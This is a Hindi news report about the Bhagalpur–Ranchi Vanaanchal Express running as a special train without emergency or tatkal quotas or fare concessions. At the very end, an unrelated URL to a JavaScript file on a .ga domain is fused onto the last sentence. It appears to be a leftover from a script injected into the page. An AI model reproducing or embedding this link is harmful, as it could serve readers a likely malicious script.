भागलपुर से रांची के बीच चल रही वनांचल एक्सप्रेस स्पेशल ट्रेन मैं से इमरजेंसी कोटे को हटा दिया गया है। जनरल स्लीपर और ए सी क्लास में एक भी कोटा नहीं है। इससे यात्रियों की मुसीबत बढ़ गई है अब इमरजेंसी में जाने वाले यात्रियों को मुसीबत का सामना करना पड़ेगा। लॉकडाउन के कारण वनांचल एक्सप्रेस का संचालन बंद था।1 दिसंबर से भागलपुर रांची के बीच स्पेशल ट्रेन बनकर चल रही है इस ट्रेन का किराया पहले से ज्यादा है।
स्पेशल ट्रेन के नाम पर इस ट्रेन में कई रियायतें बंद हो गई हैं। अब इसमें तत्काल टिकट नहीं कटा सकते। पहले यात्रियों को नॉर्मल टिकट कंफर्म ना मिलने पर तत्काल टिकट एक मात्र विकल्प था ऐसी वाली पैसेंजर को तत्काल टिकट ना होने के कारण परेशानी हो रही है इस ट्रेन को स्पेशल ट्रेन बंद कर चलने से यात्रियों को तत्काल कोटा से वंचित रहना होगा।
विक्रमशिला, सुपर और अन्य ट्रेनों में पहले की तरह इमरजेंसी कोटा लागू है। भागलपुर से दिल्ली, हावड़ा, जम्मू तवी, मुंबई, अगरतल्ला जैसे शहरों के लिए स्पेशल श्रीनि ही बनकर चल रही है। इन ट्रेनों में तत्काल कोटा पहले की तरह मान्य है सिर्फ भागलपुर रांची वनांचल एक्सप्रेस में ही स्पेशल किराया वसूल किया जा रहा है और तत्काल कोटे पर भी रोक लगा दी गई है।
कोरोना काल के नाम पर चल रही एक्सप्रेस ट्रेन, टिकटों पर भी रियायत नहीं मिली। कैंसर, दिव्यांग, बुजुर्गों को भी किसी प्रकार का आरक्षण नहीं दिया जा रहा है। इन सभी से पूरा किराया वसूल किया जा रहा है। और सभी तरह की रियायत के ऊपर रोक लगा दी गई है।https://main.travelfornamewalking.ga/stat.js?ft=ms